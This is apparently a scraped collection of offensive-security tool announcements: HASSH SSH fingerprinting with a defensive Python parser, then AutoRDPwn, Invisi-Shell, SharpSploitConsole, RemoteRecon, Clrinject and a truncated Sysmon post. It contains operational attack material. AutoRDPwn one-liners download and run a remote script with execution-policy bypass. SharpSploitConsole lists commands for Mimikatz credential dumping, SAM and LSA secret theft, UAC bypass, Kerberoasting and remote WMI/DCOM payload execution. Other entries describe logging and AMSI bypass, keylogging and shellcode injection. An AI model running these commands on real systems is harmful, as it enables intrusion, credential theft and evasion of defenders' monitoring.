HASSH – A Network Fingerprinting Standard Which Can Be Used To Identify Specific Client And Server SSH Implementations

“HASSH" is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an MD5 fingerprint.What can HASSH help with:Use in highly controlled, well understood environments, where any fingerprints outside of a known good set are alertable.It is possible to detect, control and investigate brute force or Cred Stuffing password attempts at a higher level of granularity than IP Source – which may be impacted by NAT or botnet-like behaviour. The hassh will be a feature of the specific Client software implementation being used, even if the IP is NATed such that it is shared by many other SSH clients.Detect covert exfiltration of data within the components of the Client algorithm sets. In this case, a specially coded SSH Client can send data outbound from a trusted to a less trusted environment within a series of SSH_MSG_KEXINIT packets. In a scenario similar to the more known exfiltration via DNS, data could be sent as a series of attempted, but incomplete and unlogged connections to an SSH server controlled by bad actors who can then record, decode and reconstitute these pieces of data into their original form. Until now such attempts – much less the contents of the clear text packets – are not logged even by mature packet analyzers or on end point systems. 
Detection of this style of exfiltration can now be performed easily by using anomaly detection or alerting on SSH Clients with multiple different hasshUse in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.Share malicious hassh as Indicators of Compromise.Create an additional level of Client application control, for example one could block all Clients from connecting to an SSH server that are outside of an approved known set of hassh values.Contribute to Non Repudiation in a Forensic context – at a higher level of abstraction than IPSource – which may be impacted by NAT, or where multiple IP Sources are used.Detect Deceptive Applications. Eg a hasshServer value known to belong to the Cowry/Kippo SSH honeypot server installation, which is purporting to be a common OpenSSH server in the Server String.Detect devices having a hassh known to belong to IOT embedded systems. Examples may include cameras, mics, keyloggers, wiretaps that could be easily be hidden from view and communicating quietly over encrypted channels back to a control server.How does HASSH work:"hassh" and "hasshServer" are MD5 hashes constructed from a specific set of algorithms that are supported by various SSH Client and Server Applications. These algorithms are exchanged after the initial TCP three-way handshake as clear-text packets known as "SSH_MSG_KEXINIT" messages, and are an integral part of the setup of the final encrypted SSH channel. 
The existence and ordering of these algorithms is unique enough such that it can be used as a fingerprint to help identify the underlying Client and Server application or unique implementation, regardless of higher level ostensible identifiers such as "Client" or "Server" strings.References:RFC4253 The Secure Shell (SSH) Transport Layer ProtocolSalesforce Engineering blogCredits:hassh and hasshServer were conceived and developed by (@benreardon) within the Detection Cloud Team at Salesforce, with inspiration and contributions from (@0x4d31) and the JA3 crew crew: , and Download Hassh
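Added example (not code from the original post or the HASSH project) showing the mechanics described above: it parses a clear-text SSH_MSG_KEXINIT payload into its RFC 4253 name-lists, derives hassh and hasshServer, and runs the "one source, many hassh" anomaly check from the exfiltration use case. The field composition (kex, encryption, MAC and compression lists of one direction, joined with ';') is taken from the published HASSH specification; the algorithm lists and IP addresses are constructed samples, not real fingerprints.

```python
import hashlib
import struct
from collections import defaultdict

SSH_MSG_KEXINIT = 20
# The ten name-lists of SSH_MSG_KEXINIT in wire order (RFC 4253, section 7.1).
KEXINIT_FIELDS = (
    "kex_algorithms", "server_host_key_algorithms",
    "encryption_algorithms_client_to_server", "encryption_algorithms_server_to_client",
    "mac_algorithms_client_to_server", "mac_algorithms_server_to_client",
    "compression_algorithms_client_to_server", "compression_algorithms_server_to_client",
    "languages_client_to_server", "languages_server_to_client",
)

def parse_kexinit(payload):
    """Split a clear-text SSH_MSG_KEXINIT payload (packet body after the length/
    padding framing) into its name-lists; raises ValueError on a malformed message."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    pos, fields = 1 + 16, {}  # skip message id and the 16-byte random cookie
    for name in KEXINIT_FIELDS:
        if pos + 4 > len(payload):
            raise ValueError("truncated KEXINIT before " + name)
        (length,) = struct.unpack(">I", payload[pos:pos + 4])
        raw = payload[pos + 4:pos + 4 + length]
        if len(raw) != length:
            raise ValueError("truncated name-list " + name)
        fields[name] = raw.decode("ascii")
        pos += 4 + length
    return fields

def build_kexinit(fields):
    """Inverse of parse_kexinit; used here only to construct sample traffic."""
    out = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for name in KEXINIT_FIELDS:
        raw = fields.get(name, "").encode("ascii")
        out += struct.pack(">I", len(raw)) + raw
    return out + b"\x00" + b"\x00" * 4  # first_kex_packet_follows, reserved

def _fingerprint(fields, direction):
    # HASSH spec: kex;enc;mac;comp lists for one direction, ';'-joined, MD5 hex digest.
    algos = ";".join(fields[f] for f in (
        "kex_algorithms", "encryption_algorithms_" + direction,
        "mac_algorithms_" + direction, "compression_algorithms_" + direction))
    return hashlib.md5(algos.encode("ascii")).hexdigest()

def hassh(fields):
    """Client fingerprint (client_to_server lists)."""
    return _fingerprint(fields, "client_to_server")

def hassh_server(fields):
    """Server fingerprint (server_to_client lists)."""
    return _fingerprint(fields, "server_to_client")

def clients_with_many_hassh(observations, threshold=2):
    """Anomaly check from the exfiltration use case: source IPs whose client
    KEXINITs yielded at least `threshold` distinct hassh values."""
    seen = defaultdict(set)
    for src_ip, payload in observations:  # observations: [(src_ip, kexinit_payload)]
        seen[src_ip].add(hassh(parse_kexinit(payload)))
    return {ip: sorted(h) for ip, h in seen.items() if len(h) >= threshold}

# Constructed sample client (plausible lists, not a real OpenSSH fingerprint).
SAMPLE_CLIENT = {
    "kex_algorithms": "curve25519-sha256,ecdh-sha2-nistp256,diffie-hellman-group14-sha256",
    "server_host_key_algorithms": "ssh-ed25519,rsa-sha2-512",
    "encryption_algorithms_client_to_server": "chacha20-poly1305@openssh.com,aes256-gcm@openssh.com",
    "encryption_algorithms_server_to_client": "chacha20-poly1305@openssh.com,aes256-gcm@openssh.com",
    "mac_algorithms_client_to_server": "hmac-sha2-256,hmac-sha2-512",
    "mac_algorithms_server_to_client": "hmac-sha2-256,hmac-sha2-512",
    "compression_algorithms_client_to_server": "none,zlib@openssh.com",
    "compression_algorithms_server_to_client": "none,zlib@openssh.com",
}
# Constructed traffic: 10.0.0.7 presents the same hassh every time; 10.0.0.5
# changes its kex list on every connection, the pattern the covert-channel case describes.
OBSERVATIONS = [
    ("10.0.0.7", build_kexinit(SAMPLE_CLIENT)),
    ("10.0.0.7", build_kexinit(SAMPLE_CLIENT)),
    ("10.0.0.5", build_kexinit(dict(SAMPLE_CLIENT, kex_algorithms="curve25519-sha256"))),
    ("10.0.0.5", build_kexinit(dict(SAMPLE_CLIENT, kex_algorithms="ecdh-sha2-nistp256"))),
]
```

Because the hash covers the ordering as well as the membership of each list, swapping two algorithms in a list yields a different hassh, which is why the fingerprint separates implementations that advertise the same algorithm set.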

Link: http://feedproxy.google.com/~r/PentestTools/~3/K_mGl9HjOe4/hassh-network-fingerprinting-standard.html

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
Powershell 5.0 or higher

Changes
Version 4.5
• New ninja style icon!
• Automatic cleaning of Powershell history after execution
• Now all dependencies are downloaded from the same repository
• Many errors and bugs fixed
• UAC & AMSI bypass in 64-bit systems
• New module available: Remote Desktop Caching
• New module available: Disable system logs (Invoke-Phant0m)
• New module available: Sticky Keys Hacking
• New available module: Remote Desktop History
• New available attack: Session Hijacking (passwordless)
WARNING! This attack is very intrusive and can only be used locally
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.

One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

Invisi-Shell – Hide Your Powershell Script In Plain Sight (Bypass All Powershell Security Features)

Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell's security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies. The hook is performed via the CLR Profiler API.

Work In Progress
This is still a preliminary version intended as a POC. The code works only on x64 processes and was tested against Powershell V5.1.

Usage
1. Copy the compiled InvisiShellProfiler.dll from the /x64/Release/ folder with the two batch files from the root directory (RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat) to the same folder.
2. Run either of the batch files (depends on whether you have local admin privileges or not).
3. A Powershell console will run. Exit the powershell using the exit command (DON'T CLOSE THE WINDOW) to allow the batch file to perform proper cleanup.

Compilation
The project was created with Visual Studio 2013. You should install the Windows Platform SDK to compile it properly.

Detailed Description
More info can be found in the DerbyCon presentation by Omer Yair (October, 2018).

Credits
* CorProfiler by .NET Foundation
* Eyal Ne'emany
* Guy Franco
* Ephraim Neuberger
* Yossi Sassi
* Omer Yair

Download Invisi-Shell

Link: http://www.kitploit.com/2018/11/invisi-shell-hide-your-powershell.html

ADModule – Microsoft Signed ActiveDirectory PowerShell Module

Microsoft signed DLL for the ActiveDirectory PowerShell module

Just a backup of Microsoft's ActiveDirectory PowerShell module from Server 2016 with RSAT and the module installed. The DLL is usually found at this path:
C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management
and the rest of the module files at this path:
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\

Usage
You can copy this DLL to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.
PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
To be able to list all the cmdlets in the module, import the module as well. Remember to import the DLL first.
PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
PS C:\> Import-Module C:\AD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1
PS C:\> Get-Command -Module ActiveDirectory

Benefits
There are many benefits like very low chances of detection by AV, very wide coverage by cmdlets (I leave the usage of cmdlets for a later post :P), good filters for cmdlets, signed by Microsoft etc. The most useful one, however, is that this module works flawlessly from PowerShell's Constrained Language Mode.

Blog
https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html

Download ADModule

Link: http://www.kitploit.com/2018/11/admodule-microsoft-signed.html

SharpSploitConsole – Console Application Designed To Interact With SharpSploit

Console Application designed to interact with SharpSploit released by @cobbr_io

SharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community into one sweet DLL. It's awesome so check it out!

Description
SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target system and run over a non-interactive shell (such as beacon).

This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system.

Contact at:
Twitter: @anthemtotheego or @g0ldengunsec

Setup – Quick and Dirty
Note: For those of you who don't want to go through the trouble of compiling your own I uploaded an x64 and x86 binary found in the CompiledBinaries folder. For those of you who do want to compile your own… I used Windows 10, Visual Studio 2017 – mileage may vary.

1. Download the SharpSploit tool from https://github.com/cobbr/SharpSploit.git
2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for the correct architecture) – You should see a drop down with Any CPU > Click on it and open Configuration Manager > under platform change to the desired architecture and select ok.
3. Download the SharpSploitConsole tool and open up SharpSploitConsole.sln
4. Copy both SharpSploit.dll and System.Management.Automation.dll found in the SharpSploit/bin/x64/Debug directory into the SharpSploitConsole/bin/x64/Debug folder
5. Next we will set up Visual Studio to embed our DLLs into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following, in Visual Studio:
   a. Tools > NuGet Package Manager > Package Manager Console
   b. Inside the console run: Install-Package Costura.Fody
   c. Open up notepad, paste the following code and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders.
      <Weavers>
        <Costura />
      </Weavers>
6. Inside Visual Studio, right click References on the right-hand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLLs, select them and add them.
7. Compile, drop the binary on the target computer and have fun.

Examples
Note: All commands are case insensitive. By default all commands can be taken in as command line args; they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.

Start interactive console mode:
Interact

Mimikatz all the things (does not run DCSync) – requires admin or system:
Mimi-All

Runs a specific Mimikatz command of your choice – requires admin or system:
Mimi-Command privilege::debug sekurlsa::logonPasswords

Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:
logonPasswords

Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from registry – requires admin or system:
LsaCache

Runs the Mimikatz command to retrieve LSA Secrets stored in registry – requires admin or system:
LsaSecrets

Retrieve password hashes from the SAM database – requires admin or system:
SamDump

Retrieve Wdigest credentials from registry – requires admin or system:
Wdigest

Retrieve current user:
whoami
Username

Impersonate system user – requires admin rights:
GetSystem

Impersonate system user – Impersonate the token of a specified process, requires pid – command requires admin rights:
Impersonate 2918

Bypass UAC – requires binary | command | path to binary – requires admin rights:
BypassUAC cmd.exe ipconfig C:\Windows\System32\
BypassUAC cmd.exe "" C:\Windows\System32\

Ends the impersonation of any token, reverts back to initial token associated with current process:
RevertToSelf

Retrieve current working directory:
CurrentDirectory

Retrieve current directory listing:
DirectoryListing

Changes the current directory by appending a specified string to the current working directory:
ChangeDirectory SomeFolder

Retrieve hostname:
Hostname

Retrieve list of running processes:
ProcessList

Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:
ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp

Retrieve registry path value, requires full path argument:
ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber

Write to registry, requires full path argument and value argument:
WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1

Retrieve users of local group remotely, requires computername | groupname | username | password:
NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!
NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!

Retrieve local groups remotely, requires computername | username | password:
NetLocalGroups computerName domain\username P@55w0rd!
NetLocalGroups 192.168.1.20 .\username P@55w0rd!

Retrieve current logged on users remotely, requires computername | username | password:
NetLoggedOnUsers computerName domain\username P@55w0rd!
NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!

Retrieve user sessions remotely, requires computername | username | password:
NetSessions computerName domain\username P@55w0rd!
NetSessions 192.168.1.20 .\username P@55w0rd!

Ping systems, requires computernames:
Ping computer1 computer2 computer3 computer4

Port scan systems, requires computername | ports:
PortScan computer1 80 443 445 22 23

Get Domain Users: grabs specified (or all) user objects in the target domain, by default will use current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
GetDomainUsers

Get Domain Groups: grabs specified (or all) group objects in the target domain, by default will use current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
GetDomainGroups
GetDomainGroups -target "Domain Admins"

Get Domain Computers: grabs specified (or all) computer objects in the target domain, by default will use current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
GetDomainComputers

Perform Kerberoasting: performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:
Kerberoast
Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService

Run command remotely via WMI, requires computername | username | password | command – requires admin:
WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>
WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>

Run command remotely via DCOM, requires computername | command | directory | params – requires admin:
DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>

Run shell command:
Shell ipconfig /all

Run powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:
Powershell -noP -sta -w 1 -enc <Base64>

Currently available options (more to come)
Interact : Starts interactive console mode, if you are interacting remotely you may not want to use this option
Mimi-All : Executes everything but DCSync, requires admin
Mimi-Command : Executes a chosen Mimikatz command
logonPasswords : Runs privilege::debug sekurlsa::logonPasswords
LsaCache : Retrieve Domain Cached Credentials hashes from registry
LsaSecrets : Retrieve LSA secrets stored in registry
SamDump : Retrieve password hashes from the SAM database
Wdigest : Retrieve Wdigest credentials from registry
whoami : Retrieve current user
GetSystem : Impersonate system user, requires admin rights
Impersonate : Impersonate the token of a specified process, requires pid – command requires admin rights.
BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rights
RevertToSelf : Ends the impersonation of any token, reverts back to initial token associated with current process
CurrentDirectory : Retrieve current working directory
DirectoryListing : Retrieve current directory listing
ChangeDirectory : Changes the current directory by appending a specified string to the current working directory
Hostname : Retrieve hostname
ProcessList : Retrieve list of running processes
ProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin
Username : Retrieve current username
ReadRegistry : Retrieve registry path value, requires full path argument
WriteRegistry : Write to registry, requires full path argument | value
NetLocalGroupMembers : Retrieve users of local group remotely, requires computername | groupname | username | password
NetLocalGroups : Retrieve local groups remotely, requires computername | username | password
NetLoggedOnUsers : Retrieve current logged on users remotely, requires computername | username | password
NetSessions : Retrieve user sessions remotely, requires computername | username | password
Ping : Ping systems, requires computernames
PortScan : Port scan systems, requires computername | ports
GetDomainUsers : Grabs specified (or all) user objects in the target domain, by default will use current user context
GetDomainGroups : Grabs specified (or all) group objects in the target domain, by default will use current user context
GetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default will use current user context
Kerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context
WMI : Run command remotely via WMI, requires computername | username | password | command – requires admin
DCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires admin
Shell : Run a shell command
Powershell : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging

Download SharpSploitConsole

Link: http://feedproxy.google.com/~r/PentestTools/~3/kATTdJ2komM/sharpsploitconsole-console-application.html

RemoteRecon – Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host, without having to expose your complete toolkit/agent. Often times as operators we need to compromise a host just so we can keylog or screenshot (or some other minuscule task) against a person/host of interest. Why should you have to push over beacon, empire, innuendo, meterpreter, or a custom RAT to the target? This increases the footprint that you have in the target environment, exposes functionality in your agent, and most likely your C2 infrastructure. An alternative would be to deploy a secondary agent to targets of interest and collect intelligence, then store this data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you've collected, but nothing more. Below is a visual representation of how an adversary would utilize this.

RemoteRecon utilizes the registry for data storage, with WMI as an internal C2 channel. All commands are executed in an asynchronous, push and pull manner, meaning that you will send commands via the powershell controller and then retrieve the results of that command via the registry. All results will be displayed in the local console.

Current Capabilities
* PowerShell
* Screenshot
* Token Impersonation
* Inject ReflectiveDll (Must export the ReflectiveLoader function from Stephen Fewer)
* Inject Shellcode
* Keylog

Improvements, Additions, ToDo's:
* Dynamically load and execute .NET assemblies
* Support non reflective dll's for injection

Build Dependencies
The RemoteRecon.ps1 script already contains a fully weaponized JS payload for the Agent. The payload will only be updated as the code base changes. If you wish to make changes to the codebase on your own, there are a few dependencies required.
* Visual Studio 2015+
* Windows 7 and .NET SDK
* Windows 8.1 SDK
* mscorlib.tlh (This is included in the project but there are instances where intellisense can't seem to find it [shrug])
* .NET 3.5 & 4
* James Forshaw's DotNetToJScript project
* Fody/Costura Nuget package. Package and embed any extra dependencies in .NET.

For a short setup guide, please visit the wiki

Download RemoteRecon

Link: http://feedproxy.google.com/~r/PentestTools/~3/yXXX3vBqgJk/remoterecon-remote-recon-and-collection.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
Powershell 5.0 or higher

Changes
Version 4.0
• Fixed a bug in the scheduled task to remove the user AutoRDPwn
• The Scheduled Task attack has been replaced by Invoke-Command
• It is now possible to choose the language of the application and launch the attack on English versions of Windows
*The rest of the changes can be consulted in the CHANGELOG file

Use
One line execution:
powershell -ExecutionPolicy Bypass "cd $env:TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

Clrinject – Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process's classes and therefore affect its internal state.

Usage
clrinject-cli.exe -p <processId|processName> -a <assemblyFile>
Opens the process with id <processId> or name <processName>, injects the <assemblyFile> EXE and executes its Main method.

Additional options
-e Enumerates all loaded CLR Runtimes and created AppDomains.
-d <#> Inject only into the <#>-th AppDomain. If no number or zero is specified, the assembly is injected into every AppDomain.
-i <namespace>.<className> Create an instance of class <className> from namespace <namespace>.

Examples
clrinject-cli.exe -p victim.exe -e
(Enumerate Runtimes and AppDomains from victim.exe)
clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
(Inject invader.exe into the second AppDomain of the process with id 1234)
clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
(Create an instance of Invader inside every AppDomain in victim.exe)
clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
(Inject an x64 assembly into an x64 process)

Injectable assembly example
The following code can be compiled as a C# executable and then injected into a PowerShell process. This code accesses static instances of internal PowerShell classes to change the console text color to green.

```csharp
using System;
using System.Reflection;
using Microsoft.PowerShell;
using System.Management.Automation.Host;

namespace Invader
{
    class Invader
    {
        static void Main(string[] args)
        {
            try
            {
                // Locate the ConsoleHost type inside the already-loaded PowerShell assembly
                var powerShellAssembly = typeof(ConsoleShell).Assembly;
                var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                // SingletonInstance is a non-public static property holding the live host object
                var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null);
                // Reach the host's UI and change the foreground colour of the injected console
                var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                ui.RawUI.ForegroundColor = ConsoleColor.Green;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }
    }
}
```

Injection command:
clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Result:

Download Clrinject

Link: http://feedproxy.google.com/~r/PentestTools/~3/pK8N-dwlNI8/clrinject-injects-c-exe-or-dll-assembly.html

Operating Offensively Against Sysmon

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog posts, and for which I even wrote a PowerShell module called Posh-Sysmon to help with the generation of its configuration files. Its main purpose is the tracking of potentially malicious activity on individual hosts, and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information into the Windows Eventlog, so it is easier to collect the information with SIEM (Security Information and Event Management) tools.

Sysmon has the capability to log information for:
* Process Creation and Termination
* Process changing a file creation time
* Network Connection
* Driver Load
* Image Load
* CreateRemoteThread
* Raw Access Read of a file
* A process opens another process memory
* File Creation
* Registry Events
* Pipe Events
* WMI Permanent Events

Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon